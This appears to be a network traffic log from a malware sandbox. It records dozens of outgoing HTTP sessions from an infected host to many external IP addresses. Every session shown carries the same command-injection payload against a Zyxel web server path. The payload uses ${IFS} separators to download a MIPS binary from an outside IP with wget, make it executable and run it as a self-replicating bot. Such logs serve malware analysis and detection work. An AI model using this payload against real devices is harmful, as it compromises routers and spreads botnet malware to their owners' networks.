                                      Jan 14, 2024 15:50:44.262433052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3844192.168.2.145901841.250.148.171443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.262476921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3845192.168.2.144571239.73.146.31443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.262511015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3846192.168.2.1453594139.98.42.154443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.262573957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3847192.168.2.145188238.135.155.43443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.262633085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3848192.168.2.144286838.104.5.25443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.262682915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3849192.168.2.1451108102.29.211.52443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.262718916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3850192.168.2.1457562153.14.191.72443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.262777090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3851192.168.2.145288885.202.245.161443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.262835979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3852192.168.2.1448952101.86.73.17443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.262901068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3853192.168.2.144463685.110.213.251443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.262937069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3854192.168.2.1436242132.148.122.88443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.263015032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3855192.168.2.145244623.243.68.96443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.263067961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3856192.168.2.1454040223.238.94.250443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.263091087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3857192.168.2.144111461.64.100.94443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.263128996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3858192.168.2.1451626189.109.28.42443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.263184071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3859192.168.2.1450446110.118.87.211443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.263216019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3860192.168.2.1457316148.20.197.187443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.263305902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3861192.168.2.1440222135.16.121.166443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.263362885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3862192.168.2.144188293.152.209.194443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.263401985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3863192.168.2.1434398116.233.169.128443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.263442993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3864192.168.2.1449134149.82.87.44443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.263489962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3865192.168.2.1451884108.61.173.168443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.263544083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3866192.168.2.1452866165.233.85.143443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.263583899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3867192.168.2.144732661.88.130.13443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.263626099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3868192.168.2.1456180189.170.87.177443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.263714075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3869192.168.2.14403904.38.234.145443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.263755083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3870192.168.2.1458302216.129.130.187443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.263820887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3871192.168.2.1446166131.192.128.25443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.263868093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3872192.168.2.1454464222.204.229.26443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.263909101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3873192.168.2.1438798194.1.114.12443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.263952017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3874192.168.2.1444440160.202.191.167443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.264014959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3875192.168.2.1459880126.26.223.87443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.264049053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3876192.168.2.1454866179.70.118.228443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.264117956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3877192.168.2.143846885.182.11.100443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.264178038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3878192.168.2.145206613.66.42.173443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.264210939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3879192.168.2.143773278.46.194.145443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.264290094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3880192.168.2.1435440213.21.95.225443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.264312029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3881192.168.2.1439762199.84.98.54443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.264379025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3882192.168.2.144039289.142.61.166443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.264444113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3883192.168.2.144667841.124.68.49443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.264501095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3884192.168.2.1455074175.176.4.16443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.264554024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3885192.168.2.14393324.151.195.220443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.264599085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3886192.168.2.1457682172.133.197.253443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.264668941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3887192.168.2.144950298.129.237.9443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.264708042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3888192.168.2.145203468.124.253.23443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.264736891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3889192.168.2.1435286128.225.211.165443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.264817953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3890192.168.2.1436826138.111.254.118443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.264863968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3891192.168.2.145972888.67.204.80443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.264939070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3892192.168.2.1437368119.35.207.47443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.264988899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3893192.168.2.1460278169.121.95.139443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.265043020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3894192.168.2.144616466.236.167.51443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.265110016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3895192.168.2.1443190140.49.68.35443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.265162945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3896192.168.2.1439528197.163.152.103443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.265217066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3897192.168.2.143398268.61.94.229443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.265317917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3898192.168.2.1460550162.10.164.149443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.265369892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3899192.168.2.145902877.178.69.38443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.265424013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3900192.168.2.1450666161.112.136.5443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.265485048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3901192.168.2.1457894142.8.175.55443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.265518904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3902192.168.2.144453887.168.183.165443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.265564919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3903192.168.2.1445368164.101.62.184443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.265634060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3904192.168.2.143733696.27.56.65443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.265702009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3905192.168.2.144440285.173.203.83443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.265744925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3906192.168.2.1436670120.185.183.152443
                                      TimestampBytes transferredDirectionData
